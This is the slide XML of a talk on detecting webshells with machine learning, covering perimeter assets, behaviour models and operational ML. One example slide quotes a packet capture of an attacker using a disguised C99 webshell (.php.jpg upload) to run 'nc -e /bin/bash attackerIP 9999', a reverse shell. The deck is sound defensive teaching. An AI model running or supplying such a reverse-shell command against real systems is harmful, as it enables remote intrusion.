                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer:http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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Webshell detection POC/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 20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sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the following packet capture snippet it can be seen how attacker uses netcat to send a reverse shell utilizing C99 command execution feature:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 00:33:26.996555 IP attackerIP.51421 &gt; victimdomain.80:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .....U......\%........K&lt;....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Encoding: gzip, deflate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Language: en-US,en;q=0.8,es;q=0.6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=test\%7C1465100854\%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cav3sgkd273gafknm9pb13m467act=cmd&amp;cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+-e+\%2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fbin\%2Fbash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+attackerIP+9999&amp;d=\%2Fvar\%2Fwww\%2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fwordpress\%2Fwp-content\%2Fuploads\%2F2016\%2F06\%2F&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute&amp;cmd_txt=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRP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None/>
            </a:pP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038089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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Effective Webshell detection via machine Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Webshell ML Detection Paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two models of Behavior: Local behavior and Global Asset Behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local behavior is further broken down into individual history per path in a Webserver. The webserver model is maintained as two separate individual graphs one for dynamic content and one for static content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Feature Vectors for the local content and path anomalies on a per webserver basis are then correlated with global asset path behaviors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="8" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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300" y="4018280"/>
            <a:ext cx="4889500" cy="901700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>erimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ssets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 7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dirty="0"/>
              <a:t>Perimeter assets are those infrastructure, application items that are exposed on the internet or WAN. This may include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IoTs (Cameras, RF, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Firewalls/IDS/Load Balancers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Yes… Cloud assets are also part of perimeter as long as they have a link, connection, shared credentials or access from within the organization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 21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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Machine Learning &amp; Big data technologies enhance detection  beyond the simple static based signature defense technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is possible to establish sequences of behaviors that indicate webshell access and use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The data is already there. You can use your perimeter logs (Proxy, Firewalls, Bro, Web Gateway, etc)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection mechanisms can also be enhanced and extended by covering any other measurable attack vector that delivers a web shell payload (SQli, XSS, other types of RFI, etc).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="583983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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML: How to Detect Attack Patterns That Change Over Time </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1776453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1: Break the problem in to use cases</a:t>
            </a:r>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66611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103354"/>
            <a:ext cx="3509111" cy="1143736"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3863764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2: Find what use cases have highest security impact</a:t>
            </a:r>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22904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103354"/>
            <a:ext cx="3509111" cy="2640939"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19857117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3: Decompose the problem into two types of computation</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="81995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="630314"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19619784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3: Decompose the problem into two types of computation</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="81995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="630314"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889065" y="1763248"/>
            <a:ext cx="3498272" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3606783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3: Decompose the problem into two types of computation</a:t>
            </a:r>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2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" b="81995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="630314"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889065" y="1763248"/>
            <a:ext cx="3498272" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827708" y="1970997"/>
            <a:ext cx="5005732" cy="3502799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sequential Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Exploit Chains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Timing Analysis (Periodicity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Active Directory Sequence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Authentication Graph</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Non Sequential Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Grouping Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
